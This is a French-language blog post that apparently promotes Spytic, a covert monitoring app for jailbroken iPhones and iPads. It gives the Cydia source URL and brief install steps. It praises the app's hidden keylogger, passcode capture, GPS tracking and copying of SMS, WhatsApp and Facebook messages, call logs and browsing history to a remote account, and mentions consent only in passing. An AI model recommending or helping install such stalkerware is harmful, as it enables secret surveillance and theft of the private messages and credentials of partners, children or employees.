Tout le monde connait l’application Localiser mon iPhone (Lien App Store – Gratuit), qui permet comme son nom l’indique de localiser son smartphone pommé en cas de perte. L’application Spytic pour iPhone et iPad jailbreakés va plus loin en permettant de contrôler tout ce qui se passe sur les appareils où le logiciel est installé. (en prenant garde de prévenir la personne avant l’installation bien évidemment).

spytic-iphone
Disponible gratuitement sur le Cydia store (source https://iphone.spytic.com), le logiciel Spytic, que nous vous présentions l’année dernière,  possède la particularité de donner à l’utilisateur la possibilité à distance :

  • Localisation GPS : permet de localiser l’iPhone, l’iPod Touch ou l’iPad où qu’il soit dans le monde
  • Keylogger : permet d’enregistrer toutes les frappes clavier (Nouveau)
  • Journal des SMS : permet de recevoir une copie de tous les messages reçus et envoyés (SMS, iMessages, WhatsApp, Facebook)
  • Journal des appels : permet de recevoir une copie de tous les appels émis et reçus sur l’appareil
  • Historique internet : permet de conserver une trace de tous les liens visités (sur Safari, Google Chrome)
  • Capture du code secret pour accéder au iPhone, iPad ou iPod (Nouveau)

La fonction GPS transmet la position du téléphone de la personne toutes les minutes, représentée sur une carte Google Map.

A qui s’adresse Spytic ?

Vous l’aurez deviné, le logiciel s’adresse en particulier aux parents désireux d’avoir un contrôle sur l’activité de leur(s) enfant(s) grâce à la localisation mais aussi aux messages enregistrés. Il s’adresse aussi aux professionnels qui peuvent vérifier que les téléphones fournis à leurs employés ne soient pas utilisés à des fins personnelles.

spytic
Pour installer l’application, rien de plus simple. Il suffit de la télécharger sur Cydia, la paramétrer et hop, le tour est joué. L’application est alors invisible sur votre iPhone mais transmet secrètement les données à un serveur sécurisé qui seront finalement redirigées sur le compte du client sous forme d’historique (tutoriel disponible sur le site officiel.).

Spytic Cydia source_2